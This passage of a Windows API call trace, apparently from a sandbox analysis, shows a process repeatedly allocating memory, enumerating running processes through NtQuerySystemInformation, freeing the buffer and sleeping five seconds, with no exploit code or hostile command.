returned 0x0 [0273.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.170] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.181] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.209] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.217] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.226] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.234] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.304] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.313] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.338] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 